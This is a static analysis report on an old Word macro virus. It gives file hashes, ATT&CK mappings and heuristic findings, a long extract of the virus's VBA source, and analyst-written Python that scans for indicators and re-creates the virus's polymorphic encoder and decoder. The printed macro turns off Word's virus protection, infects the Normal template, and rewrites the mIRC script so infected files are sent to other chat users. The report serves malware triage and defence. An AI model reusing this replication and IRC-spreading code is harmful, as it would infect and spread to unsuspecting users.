Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a2fddb09876f8be1…

MALICIOUS

Office (OLE)

Size: 134.0 KB
Created: 1999-07-06 22:55:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 61dfedbeeb6ad2f3970d0cc12efd0d1d
SHA-1: 128c839cd10551c7d2e3ac784b219da83e374403
SHA-256: a2fddb09876f8be10c5fa1763acc3faf465c5e7127b64d986ee2b60e9afef670
Risk score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (no Run-key or Startup-folder write appears in the recovered macro; the persistence visible in the code is infection of the Normal template)

The sample carries VBA macros with auto-execution entry points: the heuristics below flag AutoOpen and Document_Open markers, and the module recovered in the preview opens with a DOCUMENT_CLOSE handler, so code runs when the document is opened or closed. The handler sets Options.VirusProtection and Options.SaveNormalPrompt to False (silencing Word 97's macro warning and the Normal-template save prompt), saves the active document to C:\Eugene.doc, then deletes and rewrites C:\mIRC\Script.ini with an mIRC script whose on JOIN handler DCC-sends C:\Eugene.doc to every other user who joins a channel the victim is in. The rest of the module is a replication engine: it reads its own code lines from the active document's and the Normal template's VBProject code modules, generates random identifiers, inserts random comment lines, uppercases the result, encodes it with a repeating-key additive scheme (Chr(Asc(NF) + Asc(H1))) with the key appended after an apostrophe, and reads prior encoded copies back from Variables(1) of the Normal template and the active document. This is consistent with a polymorphic macro virus that spreads through the Normal template and over IRC. The MsgBox text crediting "Eugene Kaspersky" and eugene@avp.ru is a taunt embedded by the author, not evidence of origin.

Heuristics 6

  • ClamAV: Doc.Trojan.Bius-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bius-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The "no modern VBA project was recovered" clause is contradicted by the olevba extraction below (macros.bas, 161087 bytes of decoded VBA), so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as a separate signal.
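
The indicators above can be reproduced from the extracted VBA without a sandbox. The following is an added example written for this report, not part of the analysis platform or of the sample; it runs a small indicator scanner over a constructed excerpt of macros.bas (the lines quoted below in the preview), reconstructs the file the macro writes through Open/Print/Close, and lists the mIRC events the dropped script hooks. Function names (scan_indicators, recover_dropped_files, mirc_events, triage) and the indicator list are this example's own choices.

```python
"""Static triage of extracted VBA: flag the indicators this report relies on and
reconstruct files the macro drops with Open ... For Output / Print # / Close."""
import re
from typing import Dict, List

# Constructed sample: the behaviour-relevant lines of macros.bas from this report.
SAMPLE_VBA = r'''
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
O2 = Normal.ThisDocument.Variables(1).Value
ActiveDocument.SaveAs FileName:="C:\Eugene.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill "C:\mIRC\Script.ini"
Open "C:\mIRC\Script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick C:\Eugene.doc }"
Print #1, "n1=on 1:CONNECT: {"
Close 1
End Sub
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
'''

# (indicator name, pattern). Order is the order findings are reported in.
INDICATORS = [
    ("auto-exec macro", re.compile(
        r"\bSub\s+(Auto(Open|Close|Exec|Exit|New)|Document_(Open|Close|New))\b", re.I)),
    ("disables macro virus protection", re.compile(r"Options\.VirusProtection\s*=\s*False", re.I)),
    ("suppresses Normal template save prompt", re.compile(r"Options\.SaveNormalPrompt\s*=\s*False", re.I)),
    ("reads its own VBA project (macro virus replication)", re.compile(r"\.VBProject\.VBComponents\(", re.I)),
    ("touches the Normal template", re.compile(r"\bNormalTemplate\b|\bNormal\.ThisDocument\b", re.I)),
    ("saves a copy of itself to a fixed path", re.compile(r"\.SaveAs\s+FileName:=", re.I)),
    ("writes an mIRC script (IRC/DCC propagation)", re.compile(r"mirc\\script\.ini", re.I)),
    ("Shell() call", re.compile(r"\bShell\s*\(", re.I)),
]

OPEN_RE = re.compile(r'^\s*Open\s+"([^"]+)"\s+For\s+(Output|Append)\s+As\s+#?(\d+)', re.I)
PRINT_RE = re.compile(r'^\s*Print\s+#?(\d+)\s*,\s*"((?:[^"]|"")*)"\s*$', re.I)
CLOSE_RE = re.compile(r"^\s*Close\b\s*#?(\d*)", re.I)
MIRC_EVENT_RE = re.compile(r"^n\d+=on\s+\S+?:(\w+):", re.M)


def scan_indicators(vba: str) -> List[str]:
    """Names of every indicator whose pattern occurs anywhere in the source."""
    return [name for name, rx in INDICATORS if rx.search(vba)]


def recover_dropped_files(vba: str) -> Dict[str, str]:
    """Replay Open/Print/Close statically to rebuild each dropped file's text."""
    handles: Dict[str, str] = {}   # file number -> path
    files: Dict[str, str] = {}     # path -> reconstructed content
    for line in vba.splitlines():
        m = OPEN_RE.match(line)
        if m:
            path, mode, num = m.group(1), m.group(2).lower(), m.group(3)
            handles[num] = path
            if mode == "output" or path not in files:   # For Output truncates
                files[path] = ""
            continue
        m = PRINT_RE.match(line)
        if m and m.group(1) in handles:
            # VBA doubles embedded quotes; Print # with no trailing ';' ends in CRLF
            files[handles[m.group(1)]] += m.group(2).replace('""', '"') + "\r\n"
            continue
        m = CLOSE_RE.match(line)
        if m:
            if m.group(1):
                handles.pop(m.group(1), None)
            else:
                handles.clear()                          # bare Close closes all
    return files


def mirc_events(script_ini: str) -> List[str]:
    """Event names hooked by 'nN=on <level>:<EVENT>:' lines of an mIRC script.ini."""
    return MIRC_EVENT_RE.findall(script_ini)


def triage(vba: str) -> dict:
    files = recover_dropped_files(vba)
    return {
        "indicators": scan_indicators(vba),
        "dropped_files": files,
        "mirc_events": {p: mirc_events(t) for p, t in files.items()
                        if p.lower().endswith("script.ini")},
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(k, v)
```

On the excerpt, the scanner reports the auto-exec handler, both Options toggles, the VBProject access, the Normal-template reference, the SaveAs and the mIRC script write, but not Shell(): the Shell() finding in this report comes from a part of the 161 KB module that the preview does not reach. The reconstructed script.ini hooks JOIN and CONNECT, which is the DCC-send propagation the summary describes.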

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 161087 bytes
SHA-256: f0982c63a1a615ce7b07675cf563652c7c5651ccec7a8d55ed2b23bf7034b4e9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
End
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
Arsonists:
Randomize Timer
Options.VirusProtection = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
GI = 8: GJ = 10: GR = 2: NX = 21: GL = 2: LO = 5
X9 = Chr(34): C = Chr(13): CC = Chr(34)
O2 = Normal.ThisDocument.Variables(1).Value
O3 = ActiveDocument.Variables(1).Value
If Len(O2) > 8000 Or O4 > 18 Then
O5 = 1
Do While Not Mid(O2, Len(O2) - O4, 1) = "'"
O4 = O4 + 1
O7 = Right(O2, O4)
Loop
End If
MsgBox "There are many ways to be a winner. This is one of them." & Chr(13) & "For any comments, suggestions or questions contact:" & Chr(13) & "" & Chr(13) & "eugene@avp.ru", 0, "Arsonists (c) 1998 Eugene Kaspersky"
ActiveDocument.SaveAs FileName:="C:\Eugene.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill "C:\mIRC\Script.ini"
Open "C:\mIRC\Script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick C:\Eugene.doc }"
Print #1, "n1=on 1:CONNECT: {"
Close 1
End Sub
L = Int(1 * 2)
If Len(O3) > 8000 Or O8 > 18 Then
O6 = 1
Do While Not Mid(O3, Len(O3) - O8, 1) = "'"
O8 = O8 + 1
O9 = Right(O3, O8)
Loop
End If
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
AI = N1.LINES(103, 1)
If Right(NI, 8) = "Vorg:" Then N3 = 1
If Right(AI, 8) = "Vorg:" Then N4 = 1
If N3 = 0 Then
Set N5 = N2
Set N6 = N1
Else
Set N5 = N1
Set N6 = N2
End If
If O5 = 1 Then V0 = O7: NE = O2: GoTo 9
For w = 1 To 100
N8 = N8 + C
Next w
With N6
For X = 1 To .COUNTOFLINES - 1
N7 = .LINES(X, 1)
If Left(N7, 1) = "'" Then GoTo 0
N8 = N8 & N7 & C
N9 = Int(5 * Rnd + 1)
If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2)
0 Next X
N8 = UCase(N8) & "END SUB" & C & "'"
RZ = Len(N8) - U4
End With
GoSub O1: V0 = NB
Do While Not Len(N8) = Len(NE)
q = q + 1
H = H + 1
NF = Mid(N8, q, 1)
H1 = Mid(V0, H, 1)
NG = Chr(Asc(NF) + Asc(H1))
If H = Len(V0) Then H = 0
NE = NE + NG
Loop
NE = NE + "'" + V0
9 LO = 5
GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB
GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB
GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB
GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB
GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB
GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB
GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB
GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB
GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB
GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB
GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB
GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB
GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB
GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB
GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB
GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB
GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1
GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2
GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2
GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2
GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2
For m1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, m1, 1)): Next m1
GoTo NW
NA:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
6 NM = Int((122 - 48 + 1) * Rnd + 48)
If NM > 57 And NM < 65 Then GoTo 6
If NM > 90 And NM < 97 Then GoTo 6
NB = NB + Chr$(NM)
Loop
Return
O1:
NB = Chr(Int(26 * Rnd +
... (truncated)
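
The replication engine's encoding is visible in the loop beginning `Do While Not Len(N8) = Len(NE)`: each character of the uppercased body N8 is replaced by Chr(Asc(NF) + Asc(H1)) with the random key V0 cycled, and the key is appended after an apostrophe (`NE = NE + "'" + V0`). The earlier loop `Do While Not Mid(O2, Len(O2) - O4, 1) = "'"` recovers that key by scanning backwards from the end of the stored blob. The following is an added example written for this report, not code from the sample: it mirrors the key generator, body preparation and encoder in Python and supplies the inverse decoder, which the truncated preview does not show and which is inferred from the encoder. It also checks the property the macro's key recovery depends on: because every key byte is at least 48 ('0') and every body byte at least 13 (CR), no ciphertext byte can be the apostrophe (39), so the last apostrophe in the blob always delimits the key. Names (random_key, prepare_body, encode, decode) are this example's own.

```python
"""Repeating-key additive encoder used by the macro's replication engine,
and the inverse decoder for the blob it stores as body + "'" + key."""
import random

KEY_ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def random_key(rng: random.Random, lo: int = 5) -> str:
    """Mirror of the NA/O1 subroutines: one A-Z letter, then alphanumerics drawn
    from 48..122 skipping the punctuation gaps, total length Int((15-LO)*Rnd+LO)."""
    length = rng.randint(lo, 14)
    key = chr(rng.randint(65, 90))
    while len(key) < length:
        key += rng.choice(KEY_ALPHABET)
    return key


def prepare_body(source_lines, rng: random.Random) -> str:
    """What the macro builds in N8: 100 CRs of padding, every non-comment line of
    the host module, a random comment after roughly one line in five (only past
    line 3), all uppercased, then END SUB and a trailing apostrophe."""
    cr = "\r"
    out = cr * 100
    for idx, line in enumerate(source_lines, start=1):
        if line.startswith("'"):          # If Left(N7, 1) = "'" Then skip
            continue
        out += line + cr
        if rng.randint(1, 5) == 2 and idx > 3:   # N9 = GR And X > 3
            out += "'" + random_key(rng) + cr    # junk comment for polymorphism
    return out.upper() + "END SUB" + cr + "'"


def encode(body: str, key: str) -> str:
    """NG = Chr(Asc(NF) + Asc(H1)) with the key cycled; key appended after "'"."""
    out = []
    for i, c in enumerate(body):
        v = ord(c) + ord(key[i % len(key)])
        if v > 255:
            raise ValueError("VBA Chr() cannot represent %d" % v)
        out.append(chr(v))
    return "".join(out) + "'" + key


def decode(blob: str) -> str:
    """Inverse inferred from the encoder: the key is everything after the last
    apostrophe (the macro finds it with Right(O2, O4)); subtract it cyclically."""
    enc, sep, key = blob.rpartition("'")
    if not sep or not key:
        raise ValueError("no key trailer found")
    return "".join(chr(ord(c) - ord(key[i % len(key)])) for i, c in enumerate(enc))


if __name__ == "__main__":
    rng = random.Random(1)
    key = random_key(rng)
    body = prepare_body(["Private Sub DOCUMENT_CLOSE()", "On Error Resume Next",
                         "Options.VirusProtection = False", "End Sub"], rng)
    blob = encode(body, key)
    print(len(blob), repr(key), decode(blob) == body)
```

Because the scheme is a simple per-position subtraction, an analyst who finds such a blob in a document variable can strip the trailing key and decode the whole body; there is no secret beyond the appended key itself.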